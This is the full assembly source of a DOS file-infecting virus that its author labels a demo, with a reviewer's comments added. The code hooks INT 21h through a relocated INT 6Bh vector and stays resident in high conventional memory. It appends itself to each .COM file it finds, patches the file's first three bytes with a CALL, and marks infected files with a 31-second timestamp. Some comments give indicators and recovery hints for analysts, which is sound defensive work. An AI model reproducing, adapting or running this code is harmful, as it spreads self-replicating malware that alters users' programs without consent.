
;*****************************************************************************
;		 VIRUS  DEMO (older ver not destructive do not change attr
;			      found by tsafe)
;-----------------------------------------------------------------------------

; Hard-coded sizes used when the code writes and copies its own bytes.
; NOTE(review): the listing shows no ORG and no size labels, so these values
; cannot be checked against the assembled image from here.
len	equ	023ah		; byte count written from cs:0100h and copied by rep movsb
plen	equ	007bh		; byte count written starting at label 'data'
cplace  equ	9800h		; not referenced by any instruction in this listing (comments only)

;-----------------------------------------------------------------------------
;    				FIND FIRST FILE
;-----------------------------------------------------------------------------
; First instruction of the image.  It jumps unconditionally to the file
; routine at 'con', so execution that starts here never falls into the
; function-number filter below.
jmp	con

; check if a virusing operation required.
; Filter on the DOS function number in AH.  The installer later in this file
; points the INT 21h vector at offset 102h of the resident copy.
; NOTE(review): that offset is the first cmp only if the image starts at 100h
; and the jmp above assembles to two bytes -- confirm against a build.
; Each match branches to 'con'.  Handle-based and FCB-based variants of
; open/create/delete/rename are listed, plus exec and select-disk.

cmp	ah,3dh ;open file
je	con
cmp	ah,0fh ;open file
je 	con
cmp     ah,4bh ;exec!!!
je	con
cmp 	ah,0eh ;select disk
je	con
cmp 	ah,5bh ;create file
je	con
cmp	ah,16h ;create file
je	con
cmp	ah,3ch ;create file
je	con
cmp	ah,41h ;delete file
je 	con
cmp	ah,13h ;delete file
je	con
cmp	ah,56h ;rename file
je	con
cmp	ah,17h ;rename file
je	con


; end of check

; No match: hand the request to the handler reached through INT 6Bh (the
; installer copies the original INT 21h vector there), then return.
; iret reloads the FLAGS saved when the caller issued its interrupt, so flag
; results set by DOS are not passed back on this path.

int	6bh
iret


; File routine.  Saves the interrupted program's registers, then issues its
; own DOS calls through INT 6Bh instead of INT 21h, which keeps those calls
; from passing through the hooked INT 21h entry again.
con:	push	ax
push	bx
push	cx
push 	es
push	ds
push	dx


; AH=1Ah: set the Disk Transfer Area to cs:buff.  Nothing in this listing
; reads or restores the previous DTA, so the interrupted program is left
; with its DTA pointing at this buffer -- an observable side effect.
mov	ah,1ah
mov	dx,cs
mov	ds,dx
mov	dx,offset buff
int	6bh

; AH=4Eh: find first file matching fname ("*.COM", no path, so the current
; directory) with attribute mask CX=0.  The directory entry is returned in
; buff.  Carry set means no match or an error: leave via error1.
mov	ah,4eh
mov	cx,0
mov	dx,cs
mov	ds,dx
mov	dx,offset fname
int	6bh
jc	error1



;----------------------------------------------------------------------------
;		CHECK THE TIME OF FILE TO SEE IF IT IS  31*2 SEC
;----------------------------------------------------------------------------

; Marker test.  buff+16h is the file-time word of the DTA entry; its low
; five bits hold seconds/2.  A value of 31 (62 seconds, which a real clock
; never produces) is treated as "already processed" and the file is skipped.
; For responders: .COM files whose timestamp seconds field reads 31 are the
; on-disk indicator this code leaves behind.
lfnd: mov ax,word ptr buff+16h
and ax,31
cmp ax,31
jne maketim	;if time not 31 make time 31 and continue
 
; find next .com file
; AH=4Fh continues the search started with AH=4Eh; carry set = no more files.

mov ah,4fh
int 6bh
jc error1
jmp lfnd


; Unmarked file found: prepare the time word that is written back to the
; file later with AH=57h (seconds field forced to 31, other bits kept).
maketim:	mov ax,word ptr buff+16h
and ax,65504	;clear the low 5 bits (mask FFE0h)
add ax,31
mov word ptr buff+16h,ax	; store the marked time word back in the DTA copy





; find file size

;mov ax,word ptr buff+1ah



; open the file
; AH=3Dh, AL=2: open for read/write.  DS:DX = cs:buff+30, the ASCIIZ name
; field of the DTA entry filled in by find-first/find-next.

mov	ah,3dh
mov	al,2
mov	dx,cs
mov	ds,dx
mov	dx,offset buff
add	dx,30
int	6bh
jc	error1
mov	fhandle,ax		; keep the DOS handle for the calls that follow





;------------------------------------
;	close   (banner only: no close call is made here; the file is
;		 closed at label 'error')
;-----------------------------------

jmp	cont

;-----------------------------------------------------------------------------
;		NOT	FAR	ERROR (here mcafee searches for the string)
;-----------------------------------------------------------------------------
; Trampoline.  8086 conditional jumps are short-range only, so the jc
; instructions before this point target this near jmp rather than 'error'.
; The banner is the author's own note; it presumably records where an
; anti-virus signature matched this code.

error1: jmp error

;-----------------------------------------------------------------------------
;                PUT THE CALL INSTRUCTION CODE IN BUFF
;-----------------------------------------------------------------------------


; Build, in buff..buff+2, the 3-byte instruction that later replaces the
; start of the host file.  buff+1Ah is the low word of the file size from
; the DTA entry; the high word is never read in this listing.
cont:	mov ax,word ptr buff+1ah    ; ax=the file size
sub ax,3	; rel16 displacement from the byte after the 3-byte instruction to end of file
mov	buff+1,al
mov	buff+2,ah
mov	ax,00e8h	; E8h = near CALL opcode
mov	buff,al

;-----------------------------------------------------------------------------
;		READ THE 3 FIRST BYTES FROM THE FILE
;-----------------------------------------------------------------------------

; AH=42h, AL=0: seek to offset CX:DX = 0 from the start of the file.
mov	ah,42h
mov	al,0
mov	bx,fhandle
mov	cx,0
mov	dx,0
int	6bh
jc	error1


; AH=3Fh: read 3 bytes into buff+3..buff+5 (the host's original first bytes).
mov	ah,3fh
mov	dx,cs
mov	ds,dx
mov	dx,offset buff
add	dx,3
mov	bx,fhandle
mov	cx,3
int	6bh
jc	error1
cmp	ax,cx		; ax = bytes actually read
jl	error1		; fewer than 3 bytes available: give up on this file


;-----------------------------------------------------------------------------
;			MOVE 3 BYTES FROM BUFF+3 TO dat1-3
;-----------------------------------------------------------------------------
; dat1/dat2/dat3 are the immediate bytes of the three instructions defined
; with db at label 'data' (C6 06 00 01 ib = mov byte ptr [0100h],imm8, and
; the same for 0101h and 0102h).  Filling them in stores the host's original
; first three bytes inside the appended stub.  For disinfection work, those
; three immediates are where the original bytes can be recovered from.

mov	al,buff+3
mov	dat1,al
mov	al,buff+4
mov	dat2,al
mov	al,buff+5
mov	dat3,al

;-----------------------------------------------------------------------------
; 		WRITE THE JMP INSTRUCTION TO THE DISK
;-----------------------------------------------------------------------------


; AH=42h, AL=0: seek back to offset 0 of the file.
mov	ah,42h
mov	al,0
mov	bx,fhandle
mov	cx,0
mov	dx,0
int	6bh
jc	error1


; AH=40h: overwrite the first 3 bytes of the file with buff..buff+2
; (opcode E8h plus a 16-bit displacement, i.e. a near CALL to the old
; end of file).  A short write is treated as failure.
mov	ah,40h
mov	dx,cs
mov	ds,dx
mov	dx,offset buff
mov	bx,fhandle
mov	cx,3
int	6bh
jc	error
cmp	ax,3
jne	error


;-----------------------------------------------------------------------------
;	CALCULATE THE START ADDRESS OF THE VIRUS DATA ITSELF
;-----------------------------------------------------------------------------
; sdat1 is the 16-bit immediate of the hand-assembled "mov si,imm16" at
; label 'source'.  Value = original file size + 100h + plen: the in-memory
; offset, in a loaded .COM, of the bytes written after the plen-byte stub.

mov ax,word ptr buff+1ah
add	ax,100h
add	ax,plen
mov	sdat1,al
mov	sdat1+1,ah

;-----------------------------------------------------------------------------
;			WRITE THE VIRUS PREFIX TO DISK
;-----------------------------------------------------------------------------

; AH=42h, AL=2 with CX:DX = 0: seek to end of file.
mov	ah,42h
mov	al,2
mov	bx,fhandle
mov	cx,0
mov	dx,0
int	6bh
jc	error

; AH=40h: append plen bytes starting at label 'data' (the stub).
mov	ah,40h
mov	dx,cs
mov	ds,dx
mov	dx,offset data
mov	bx,fhandle
mov	cx,plen
int	6bh
jc	error
cmp	ax,plen
jne	error


;----------------------------------------------------------------------------
;	APPEND len BYTES TAKEN FROM cs:0100h, DIRECTLY AFTER THE STUB
;----------------------------------------------------------------------------
; Net change to the file on disk: first 3 bytes replaced, and the file
; grows by plen + len bytes (7Bh + 23Ah with the equates in this file).

mov	ah,40h
mov	dx,cs
mov	ds,dx
mov	dx,0100h
mov	bx,fhandle
mov	cx,len
int	6bh
jc	error
cmp	ax,len
jne	error


;-----------------------------------------------------------------------------
;			set old date again + fixed time
;-----------------------------------------------------------------------------

; AH=57h, AL=1: set the date/time of the open file.  DX = the date word
; returned by the directory search (unchanged); CX = the time word with its
; seconds field forced to 31 at 'maketim'.  The modification date therefore
; looks untouched while the time carries the marker tested at 'lfnd'.
; The result of this call is not checked.
mov ah,57h
mov al,01h
mov bx,fhandle
mov cx,word ptr buff+16h
mov dx,word ptr buff+18h
int 6bh

;-----------------------------------------------------------------------------
;			CLOSE FILE
;-----------------------------------------------------------------------------
; Shared exit: reached by fall-through on success and by every error branch.

error:	mov	ah,3eh
mov	bx,fhandle
int	6bh


;-----------------------------------------------------------------------------

;-----------------------------------------------------------------------------
;		RESTORE REGISTERS AND FORWARD THE ORIGINAL REQUEST
;	(the author's banner here read "WRITE THE VIRUS TO DISK"; no write
;	 happens below this point)
;-----------------------------------------------------------------------------

; Pops mirror the pushes at 'con' in reverse order.
pop	dx
pop	ds
pop	es
pop	cx
pop	bx
pop	ax

; The interrupted program's own DOS request, registers intact, is now passed
; to the handler reached through INT 6Bh.
int	6bh

; Return to the interrupted program.
iret




;*****************************************************************************
;  				DATA SECTION
;-----------------------------------------------------------------------------

; buff: 43-byte Disk Transfer Area for find-first/find-next.  Fields used by
; the code: +16h file time, +18h file date, +1Ah file size (low word),
; +1Eh (30) ASCIIZ file name.  Bytes 0..2 are reused to build the 3-byte
; CALL and bytes 3..5 to hold the host's original first three bytes.
buff	db	43 dup (0)
fname	db	"*.COM",0	; search pattern passed to AH=4Eh

fhandle dw	?		; DOS handle of the file currently open


; Start of the plen-byte stub appended to each file.  The db lines are
; hand-assembled instructions: 198,6 = C6 06 = mov byte ptr [disp16],imm8.
; They put the host's original bytes back at 0100h..0102h when the stub runs.
data	db	198,6,0,1	; mov byte ptr [0100h],imm8
dat1	db	0		;   imm8: original byte 0, filled in per file
datb	db	198,6,1,1	; mov byte ptr [0101h],imm8
dat2	db	0		;   imm8: original byte 1, filled in per file
datc	db	198,6,2,1	; mov byte ptr [0102h],imm8
dat3	db	0		;   imm8: original byte 2, filled in per file


; Stub code that follows the db-defined instructions at 'data'.  It is
; reached through the 3-byte CALL written at the start of a modified file,
; so the word on top of the stack is that CALL's return address.  It is
; replaced with 100h so the final ret resumes the host at its first byte.
pop	bx	;change the call data to 100h
mov	bx,100h
push	bx

; push all registeres

push	ax
push	dx
push	ds

;-----------------------------------------------------------------------------
;			check if virus is already in MEMORY
;	if it is, use the one in memory
;-----------------------------------------------------------------------------
; With DS=0 the code reads two low-memory words:
;   0:413h  BIOS base-memory size in KB; times 40h gives the segment just
;           above conventional memory; minus 867h gives the segment this
;           code uses for its resident copy
;           (worked example: 640 KB -> A000h - 867h = 9799h).
;   0:86h   segment half of the INT 21h vector.
; Equal values mean INT 21h already points into that segment, and the
; install steps are skipped.
; For responders: an INT 21h vector whose segment equals (KB*40h - 867h) is
; the in-memory indicator this test relies on.

push ds
mov ax,0
mov ds,ax
mov ax,[413h]
mov bx,40h
mul bx			; dx:ax = ax*bx; dx was saved above
sub ax,867h
mov cx,ax
mov ax,[86h]
pop ds
cmp ax,cx
je  ggo
push cx			; target segment, popped into es by the copy code that follows
;

; Copy len bytes from ds:si (ds = cs) to es:0100h.
; 'source'/'sdat1' form a hand-assembled "mov si,imm16" (BEh + 2 bytes);
; the immediate is zero in this listing and is filled in per file by the
; code that stores to sdat1.  es receives the word pushed just before this
; block (the segment computed from 0:413h).
mov 	cx,len
source	db	190	;MOV SI,OFFSET SOURCE
sdat1	db	0,0
mov 	di,100h
push	cs
pop	ds
pop	es ;cplace-> now 9800h   (author's note; the value popped is the computed segment)
cld
rep movsb



;--------------------------------------------------------------------------
;		PUT INT 21H VECT. TO int 6bh
;--------------------------------------------------------------------------
; With DS=0, copy the INT 21h vector (0:84h..87h = 21h*4) into the INT 6Bh
; slot (0:1ACh..1AFh = 6Bh*4).  INT 6Bh then reaches the original DOS entry.
; NOTE(review): if these assemble as word-sized push/pop, the four pairs
; overlap and the last one also writes 0:1B0h, the first byte of the INT 6Ch
; vector -- confirm against a build.
push	ds
mov	ax,0
mov	ds,ax
push 	[84h]
pop     [1ach]

push	[85h]
pop	[1adh]

push	[86h]
pop	[1aeh]

push	[87h]
pop	[1afh]

;------------------------------------------------------------------------
;		HOOK THE VIRUS TO INT 21
;------------------------------------------------------------------------
; INT 21h vector := es:0102h, where es is the segment of the copied code.
; For responders: INT 21h pointing at offset 0102h in a segment just below
; the top of conventional memory, together with an INT 6Bh vector that
; points into DOS, are the resident indicators visible in this listing.


; hook the virus
mov	ax,102h
mov	[84h],ax
mov	[86h],es ;put cplace
pop	ds

;-----------------------------------------------------------------------
;
;-----------------------------------------------------------------------
; Common tail of the stub, reached both after installing and when the
; residency check found the code already in memory.
; AH=0Fh (FCB open) is one of the function numbers matched by the filter at
; the top of this file, so this INT 21h passes through the hooked handler.
; DS:DX is not set up for the call here; presumably it is issued only to
; trigger the handler once -- NOTE(review): intent not stated in the source.
ggo:	 mov	ah,0fh
int	21h

; pop all registeres
pop ds
pop dx
pop ax

; Returns to the address placed on the stack at the start of the stub
; (100h), so the host program runs from its first byte.
ret
